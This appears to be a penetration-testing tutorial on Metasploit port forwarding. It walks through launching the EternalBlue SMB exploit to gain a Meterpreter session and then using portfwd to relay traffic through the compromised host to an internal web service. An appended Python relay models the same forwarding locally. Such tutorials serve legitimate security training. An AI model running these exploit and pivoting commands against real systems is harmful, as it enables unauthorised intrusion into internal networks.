Metasploit: Port Forwarding

Port Forwarding with Metasploit

Port forwarding allows you to access a service that is normally inaccessible from your attacking machine by forwarding the traffic through a compromised system. This is typically used to access internal services behind firewalls or NAT devices.

In Metasploit, port forwarding is configured from a Meterpreter session: the compromised system acts as a relay, forwarding traffic from your attacking machine to other internal services that it can reach.

Setting Up Port Forwarding in Metasploit

Step 1: Compromise the Target

Just like in the network pivoting scenario, you must first compromise the target system and obtain a Meterpreter session.

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target_ip>
set LHOST <your_ip>
run

Once the exploit succeeds, you will have a Meterpreter session:

meterpreter > sessions

Step 2: Set Up Port Forwarding

To forward ports through the compromised system, use the portfwd command in Meterpreter. For example, to forward local port 8080 on your attacking machine to port 80 on the internal network (192.168.1.100), use:

meterpreter > portfwd add -l 8080 -p 80 -r 192.168.1.100

Here:

  • -l 8080 specifies the local port on your attacking machine.

  • -p 80 specifies the remote port on the internal network.

  • -r 192.168.1.100 specifies the internal target system.

Now, when you access http://localhost:8080 on your attacking machine, the traffic is relayed through the compromised system to the internal web service running on 192.168.1.100:80.

Step 3: Verify Port Forwarding

To verify that the port forwarding is working, try accessing the forwarded port in your browser or using tools like curl or wget.

curl http://localhost:8080

This should route your request through the compromised system to the internal service.

Step 4: Remove Port Forwarding

Once you’re done with the port forwarding, you can remove it using the following command:

meterpreter > portfwd delete -l 8080

This will stop forwarding traffic from localhost:8080.
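As an added illustration (not part of the original page, and not Metasploit's own code), here is a minimal Python TCP relay that models the three portfwd arguments: a listener on the local port (-l) accepts a connection and relays it to the remote host and port (-r, -p). With Meterpreter that second hop is made by the compromised host over the session channel; in this stand-alone model both ends run on localhost, with a constructed echo server standing in for the internal service at 192.168.1.100:80, and the function names portfwd_add/portfwd_delete are assumed for the sake of the example.

```python
import socket
import threading

def _pump(src, dst):
    """Copy src -> dst until EOF, then pass the EOF on as a half-close."""
    try:
        while chunk := src.recv(4096):
            dst.sendall(chunk)
        dst.shutdown(socket.SHUT_WR)
    except OSError:
        pass

def _relay(listener, target):
    while True:  # each accepted client gets its own connection to target
        try:
            client, _ = listener.accept()
        except OSError:  # listener closed by portfwd_delete()
            return
        try:
            remote = socket.create_connection(target)
        except OSError:  # internal service unreachable: drop the client
            client.close()
            continue
        for a, b in ((client, remote), (remote, client)):
            threading.Thread(target=_pump, args=(a, b), daemon=True).start()

def portfwd_add(lport, rhost, rport):
    """Model of `portfwd add -l lport -p rport -r rhost`; returns the listener."""
    listener = socket.create_server(("127.0.0.1", lport))
    threading.Thread(target=_relay, args=(listener, (rhost, rport)), daemon=True).start()
    return listener

def portfwd_delete(listener):  # model of `portfwd delete -l lport`
    listener.close()  # stops new connections; already-relayed ones keep running

def _echo_service(srv):
    conn, _ = srv.accept()  # constructed stand-in for 192.168.1.100:80
    _pump(conn, conn)  # echo everything back, then half-close

def roundtrip(payload):
    """Push payload through the forward; return what the internal service answered."""
    svc = socket.create_server(("127.0.0.1", 0))
    threading.Thread(target=_echo_service, args=(svc,), daemon=True).start()
    fwd = portfwd_add(0, "127.0.0.1", svc.getsockname()[1])  # port 0: any free port
    with socket.create_connection(fwd.getsockname(), timeout=5) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)
        data = b"".join(iter(lambda: c.recv(4096), b""))
    portfwd_delete(fwd)
    return data
```

Running roundtrip(b"GET / HTTP/1.0\r\n\r\n") sends the request in through the local listener and gets the same bytes back from the stand-in service, which is the path a real request takes through portfwd once the Meterpreter hop is substituted for the second connection.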
